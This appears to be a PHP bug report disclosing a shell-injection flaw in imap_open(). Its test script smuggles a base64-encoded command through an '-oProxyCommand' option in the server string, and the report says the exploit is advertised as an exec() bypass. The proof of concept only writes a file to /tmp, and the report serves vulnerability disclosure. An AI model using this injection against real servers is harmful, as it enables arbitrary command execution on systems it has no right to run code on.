Description:
------------
I just saw this posted on reddit and wanted to make sure PHP takes note, I haven't found it mentioned in the bug database yet:
https://github.com/Bo0oM/PHP_imap_open_exploit

It seems imap_open() has some kind of shell injection. This is advertised as an exec() bypass if exec() is not allowed, however I could also imagine this opens up a security problem in case you have any kind of imap frontend that allows users to configure their own server.

Likely the input to the function should be properly sanitized.

Test script:
---------------
<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());